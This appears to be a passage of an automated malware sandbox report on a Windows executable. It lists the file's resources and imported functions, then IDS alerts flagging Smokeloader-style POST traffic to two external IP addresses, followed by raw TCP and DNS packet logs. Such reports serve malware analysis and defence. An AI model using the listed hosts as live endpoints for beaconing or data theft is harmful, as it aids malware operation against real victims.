                                              RT_CURSOR0x669480x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                              RT_ICON0x5e4f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.38832622601279315
                                              RT_ICON0x5e4f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.38832622601279315
                                              RT_ICON0x5f3980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5532490974729242
                                              RT_ICON0x5f3980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5532490974729242
                                              RT_ICON0x5fc400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6296082949308756
                                              RT_ICON0x5fc400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6296082949308756
                                              RT_ICON0x603080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6676300578034682
                                              RT_ICON0x603080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6676300578034682
                                              RT_ICON0x608700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.49844398340248963
                                              RT_ICON0x608700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.49844398340248963
                                              RT_ICON0x62e180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.5180581613508443
                                              RT_ICON0x62e180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.5180581613508443
                                              RT_ICON0x63ec00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.5040983606557377
                                              RT_ICON0x63ec00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.5040983606557377
                                              RT_ICON0x648480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5656028368794326
                                              RT_ICON0x648480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5656028368794326
                                              RT_DIALOG0x671480x58data0.8977272727272727
                                              RT_STRING0x671a00x57adataTamilIndia0.42368045649072755
                                              RT_STRING0x671a00x57adataTamilSri Lanka0.42368045649072755
                                              RT_STRING0x677200x2ccdataTamilIndia0.473463687150838
                                              RT_STRING0x677200x2ccdataTamilSri Lanka0.473463687150838
                                              RT_STRING0x679f00x4eadataTamilIndia0.4507154213036566
                                              RT_STRING0x679f00x4eadataTamilSri Lanka0.4507154213036566
                                              RT_ACCELERATOR0x64d280x48dataTamilIndia0.8472222222222222
                                              RT_ACCELERATOR0x64d280x48dataTamilSri Lanka0.8472222222222222
                                              RT_GROUP_CURSOR0x651d00x22data1.0294117647058822
                                              RT_GROUP_CURSOR0x66eb00x30data0.9375
                                              RT_GROUP_ICON0x64cb00x76dataTamilIndia0.6610169491525424
                                              RT_GROUP_ICON0x64cb00x76dataTamilSri Lanka0.6610169491525424
                                              RT_VERSION0x66ee00x264data0.5359477124183006
                                              DLLImport
                                              KERNEL32.dllGetComputerNameA, TlsGetValue, GetConsoleAliasExesA, CreateProcessW, ClearCommError, InterlockedIncrement, GetCurrentProcess, SetEnvironmentVariableW, SetComputerNameW, GetTickCount, CreateNamedPipeW, EnumTimeFormatsA, CreateActCtxW, GetCurrencyFormatW, GetEnvironmentStrings, SetFileShortNameW, GetLocaleInfoW, ReadConsoleInputA, SetVolumeMountPointA, GetVersionExW, GetTimeFormatW, GetFileAttributesW, GetModuleFileNameW, GetShortPathNameA, CreateJobObjectA, LCMapStringA, VerifyVersionInfoW, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceA, GlobalFree, GetTempFileNameA, LoadLibraryA, CreateSemaphoreW, InterlockedExchangeAdd, GetNumberFormatW, OpenEventA, GetCommMask, OpenJobObjectW, GetModuleFileNameA, GlobalUnWire, GetCurrentDirectoryA, GetShortPathNameW, GetDiskFreeSpaceExA, SetFileAttributesW, CommConfigDialogW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, RaiseException, RtlUnwind, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, TerminateProcess, IsDebuggerPresent, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, HeapSize, GetLocaleInfoA, GetModuleHandleA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
                                              USER32.dllGetAltTabInfoW
                                              Language of compilation systemCountry where language is spokenMap
                                              TamilIndia
                                              TamilSri Lanka
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-10-20T06:02:29.062843+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.456798181.123.219.2380TCP
                                              2024-10-20T06:03:47.872011+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.457004181.123.219.2380TCP
                                              2024-10-20T06:04:03.773750+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.457064181.123.219.2380TCP
                                              2024-10-20T06:04:21.852569+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.457074181.123.219.2380TCP
                                              2024-10-20T06:04:37.747088+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.457075181.123.219.2380TCP
                                              2024-10-20T06:04:54.668067+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.457076181.123.219.2380TCP
                                              2024-10-20T06:05:13.486893+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.457077152.231.120.380TCP
                                              2024-10-20T06:05:33.359838+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.459097152.231.120.380TCP
                                              2024-10-20T06:05:50.361206+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.459098152.231.120.380TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 20, 2024 06:02:27.675338030 CEST5679880192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:02:27.680279970 CEST8056798181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:02:27.680357933 CEST5679880192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:02:27.680521011 CEST5679880192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:02:27.680555105 CEST5679880192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:02:27.685288906 CEST8056798181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:02:27.685447931 CEST8056798181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:02:29.062674999 CEST8056798181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:02:29.062843084 CEST5679880192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:02:29.062906027 CEST5679880192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:02:29.067642927 CEST8056798181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:03:46.508483887 CEST5700480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:03:46.513364077 CEST8057004181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:03:46.513470888 CEST5700480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:03:46.513629913 CEST5700480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:03:46.513658047 CEST5700480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:03:46.518469095 CEST8057004181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:03:46.518520117 CEST8057004181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:03:47.871893883 CEST8057004181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:03:47.872010946 CEST5700480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:03:47.873688936 CEST5700480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:03:47.878511906 CEST8057004181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:02.356702089 CEST5706480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:02.361716986 CEST8057064181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:02.361820936 CEST5706480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:02.361991882 CEST5706480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:02.362026930 CEST5706480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:02.366863012 CEST8057064181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:02.366976023 CEST8057064181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:03.773643970 CEST8057064181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:03.773750067 CEST5706480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:03.776237965 CEST5706480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:03.781086922 CEST8057064181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:20.498364925 CEST5707480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:20.503598928 CEST8057074181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:20.503731966 CEST5707480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:20.503911972 CEST5707480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:20.503942966 CEST5707480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:20.508712053 CEST8057074181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:20.508862019 CEST8057074181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:21.852444887 CEST8057074181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:21.852569103 CEST5707480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:21.852637053 CEST5707480192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:21.857476950 CEST8057074181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:36.342783928 CEST5707580192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:36.347974062 CEST8057075181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:36.348074913 CEST5707580192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:36.348220110 CEST5707580192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:36.348248005 CEST5707580192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:36.353238106 CEST8057075181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:36.353270054 CEST8057075181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:37.746958017 CEST8057075181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:37.747087955 CEST5707580192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:37.747124910 CEST5707580192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:37.751983881 CEST8057075181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:53.259325981 CEST5707680192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:53.264332056 CEST8057076181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:53.264436007 CEST5707680192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:53.264657021 CEST5707680192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:53.264688969 CEST5707680192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:53.269393921 CEST8057076181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:53.269591093 CEST8057076181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:54.667985916 CEST8057076181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:04:54.668066978 CEST5707680192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:54.668104887 CEST5707680192.168.2.4181.123.219.23
                                              Oct 20, 2024 06:04:54.673038006 CEST8057076181.123.219.23192.168.2.4
                                              Oct 20, 2024 06:05:11.496117115 CEST5707780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:11.501161098 CEST8057077152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:11.501264095 CEST5707780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:11.501455069 CEST5707780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:11.501496077 CEST5707780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:11.506344080 CEST8057077152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:11.506372929 CEST8057077152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:13.486825943 CEST8057077152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:13.486846924 CEST8057077152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:13.486862898 CEST8057077152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:13.486892939 CEST5707780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:13.486943960 CEST5707780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:13.486962080 CEST5707780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:13.486962080 CEST5707780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:13.491801977 CEST8057077152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:32.102277994 CEST5909780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:32.108062983 CEST8059097152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:32.108166933 CEST5909780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:32.108335018 CEST5909780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:32.108369112 CEST5909780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:32.113135099 CEST8059097152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:32.113308907 CEST8059097152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:33.359750032 CEST8059097152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:33.359838009 CEST5909780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:33.359929085 CEST5909780192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:33.364717007 CEST8059097152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:49.088704109 CEST5909880192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:49.094296932 CEST8059098152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:49.094371080 CEST5909880192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:49.094544888 CEST5909880192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:49.094574928 CEST5909880192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:49.099347115 CEST8059098152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:49.099479914 CEST8059098152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:50.360996962 CEST8059098152.231.120.3192.168.2.4
                                              Oct 20, 2024 06:05:50.361206055 CEST5909880192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:50.361206055 CEST5909880192.168.2.4152.231.120.3
                                              Oct 20, 2024 06:05:50.366110086 CEST8059098152.231.120.3192.168.2.4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 20, 2024 06:02:23.452756882 CEST5458253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:02:24.443025112 CEST5458253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:02:24.449812889 CEST53545821.1.1.1192.168.2.4
                                              Oct 20, 2024 06:02:25.741895914 CEST53545821.1.1.1192.168.2.4
                                              Oct 20, 2024 06:02:29.066656113 CEST5906053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:02:30.052763939 CEST5906053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:02:31.053829908 CEST5906053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:02:33.052539110 CEST5906053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:02:35.266899109 CEST53590601.1.1.1192.168.2.4
                                              Oct 20, 2024 06:02:35.266913891 CEST53590601.1.1.1192.168.2.4
                                              Oct 20, 2024 06:02:35.266922951 CEST53590601.1.1.1192.168.2.4
                                              Oct 20, 2024 06:02:35.266932011 CEST53590601.1.1.1192.168.2.4
                                              Oct 20, 2024 06:02:35.271102905 CEST5182153192.168.2.41.1.1.1
                                              Oct 20, 2024 06:02:35.279709101 CEST53518211.1.1.1192.168.2.4
                                              Oct 20, 2024 06:02:35.281821966 CEST5379353192.168.2.41.1.1.1
                                              Oct 20, 2024 06:02:36.271622896 CEST5379353192.168.2.41.1.1.1
                                              Oct 20, 2024 06:02:37.286936998 CEST5379353192.168.2.41.1.1.1
                                              Oct 20, 2024 06:02:39.287017107 CEST5379353192.168.2.41.1.1.1
                                              Oct 20, 2024 06:02:41.426759005 CEST53537931.1.1.1192.168.2.4
                                              Oct 20, 2024 06:02:41.426774979 CEST53537931.1.1.1192.168.2.4
                                              Oct 20, 2024 06:02:41.426783085 CEST53537931.1.1.1192.168.2.4
                                              Oct 20, 2024 06:02:41.426793098 CEST53537931.1.1.1192.168.2.4
                                              Oct 20, 2024 06:03:48.111795902 CEST6348953192.168.2.41.1.1.1
                                              Oct 20, 2024 06:03:49.116193056 CEST6348953192.168.2.41.1.1.1
                                              Oct 20, 2024 06:03:50.115669012 CEST6348953192.168.2.41.1.1.1
                                              Oct 20, 2024 06:03:52.115117073 CEST6348953192.168.2.41.1.1.1
                                              Oct 20, 2024 06:03:54.340567112 CEST53634891.1.1.1192.168.2.4
                                              Oct 20, 2024 06:03:54.340609074 CEST53634891.1.1.1192.168.2.4
                                              Oct 20, 2024 06:03:54.340636969 CEST53634891.1.1.1192.168.2.4
                                              Oct 20, 2024 06:03:54.340667963 CEST53634891.1.1.1192.168.2.4
                                              Oct 20, 2024 06:03:54.374310017 CEST5321653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:03:54.383609056 CEST53532161.1.1.1192.168.2.4
                                              Oct 20, 2024 06:03:54.422172070 CEST5353253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:03:55.418617964 CEST5353253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:03:56.428385973 CEST5353253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:03:58.560297966 CEST5353253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:00.589171886 CEST53535321.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:00.589210987 CEST53535321.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:00.589222908 CEST53535321.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:00.589234114 CEST53535321.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:03.798331976 CEST5624253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:04.803531885 CEST5624253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:05.822396994 CEST5624253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:07.820353031 CEST5624253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:09.986706972 CEST53562421.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:09.986751080 CEST53562421.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:09.986778975 CEST53562421.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:09.986804962 CEST53562421.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:09.998655081 CEST5623253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:10.008263111 CEST53562321.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:10.020721912 CEST5955353192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:11.021517992 CEST5955353192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:12.037214994 CEST5955353192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:14.037036896 CEST5955353192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:16.183670998 CEST53595531.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:16.183717012 CEST53595531.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:16.183760881 CEST53595531.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:16.183788061 CEST53595531.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:21.862377882 CEST6334953192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:22.849551916 CEST6334953192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:23.865495920 CEST6334953192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:25.880780935 CEST6334953192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:28.185077906 CEST53633491.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:28.185116053 CEST53633491.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:28.185142994 CEST53633491.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:28.185168982 CEST53633491.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:28.191004038 CEST5064453192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:28.200258017 CEST53506441.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:28.202442884 CEST5876053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:29.361452103 CEST5876053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:30.366839886 CEST5876053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:32.239702940 CEST53587601.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:32.239742994 CEST53587601.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:32.239770889 CEST53587601.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:37.762324095 CEST5451253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:38.764034986 CEST5451253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:39.775680065 CEST5451253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:41.781719923 CEST5451253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:43.959927082 CEST53545121.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:43.959966898 CEST53545121.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:43.960012913 CEST53545121.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:43.960038900 CEST53545121.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:43.985183001 CEST5957053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:43.994116068 CEST53595701.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:43.996458054 CEST5284753192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:45.017965078 CEST5284753192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:46.010179043 CEST5284753192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:48.007585049 CEST53528471.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:48.007607937 CEST53528471.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:48.007621050 CEST53528471.1.1.1192.168.2.4
                                              Oct 20, 2024 06:04:54.693775892 CEST5151653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:55.709264994 CEST5151653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:56.711445093 CEST5151653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:04:58.730252981 CEST5151653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:02.708540916 CEST53515161.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:02.708580971 CEST53515161.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:02.708609104 CEST53515161.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:02.708636045 CEST53515161.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:02.754718065 CEST6437753192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:02.764462948 CEST53643771.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:02.780143976 CEST6379653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:03.771567106 CEST6379653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:04.771477938 CEST6379653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:04.788497925 CEST53637961.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:04.788538933 CEST53637961.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:04.788570881 CEST53637961.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:09.141108036 CEST6519653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:10.146533012 CEST6519653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:11.146544933 CEST6519653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:11.495147943 CEST53651961.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:11.495191097 CEST53651961.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:11.495219946 CEST53651961.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:13.497422934 CEST5026453192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:14.490206957 CEST5026453192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:14.497441053 CEST53502641.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:20.337811947 CEST53502641.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:21.724271059 CEST5076653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:21.733058929 CEST53507661.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:21.735491991 CEST5578653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:22.725940943 CEST5578653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:23.743175030 CEST5578653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:25.757951021 CEST5578653192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:27.945332050 CEST53557861.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:27.945372105 CEST53557861.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:27.945400000 CEST53557861.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:27.945426941 CEST53557861.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:33.383588076 CEST5886053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:34.380913973 CEST5886053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:35.397222042 CEST5886053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:37.412142992 CEST5886053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:39.637048006 CEST53588601.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:39.637089014 CEST53588601.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:39.637100935 CEST53588601.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:39.637113094 CEST53588601.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:39.661550045 CEST5307253192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:39.670794010 CEST53530721.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:39.696885109 CEST6503753192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:40.709117889 CEST6503753192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:41.709932089 CEST6503753192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:43.709012032 CEST6503753192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:43.822143078 CEST53650371.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:43.822181940 CEST53650371.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:43.822210073 CEST53650371.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:43.822236061 CEST53650371.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:50.380108118 CEST5956453192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:51.384907007 CEST5956453192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:52.396862030 CEST5956453192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:54.403475046 CEST5956453192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:56.591583967 CEST53595641.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:56.591639042 CEST53595641.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:56.591665983 CEST53595641.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:56.591694117 CEST53595641.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:56.611051083 CEST5297553192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:56.619939089 CEST53529751.1.1.1192.168.2.4
                                              Oct 20, 2024 06:05:56.637810946 CEST6329053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:57.630898952 CEST6329053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:05:58.652486086 CEST6329053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:06:00.662128925 CEST6329053192.168.2.41.1.1.1
                                              Oct 20, 2024 06:06:02.934820890 CEST53632901.1.1.1192.168.2.4
                                              Oct 20, 2024 06:06:02.934834957 CEST53632901.1.1.1192.168.2.4
                                              Oct 20, 2024 06:06:02.934844017 CEST53632901.1.1.1192.168.2.4
                                              Oct 20, 2024 06:06:02.934853077 CEST53632901.1.1.1192.168.2.4
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
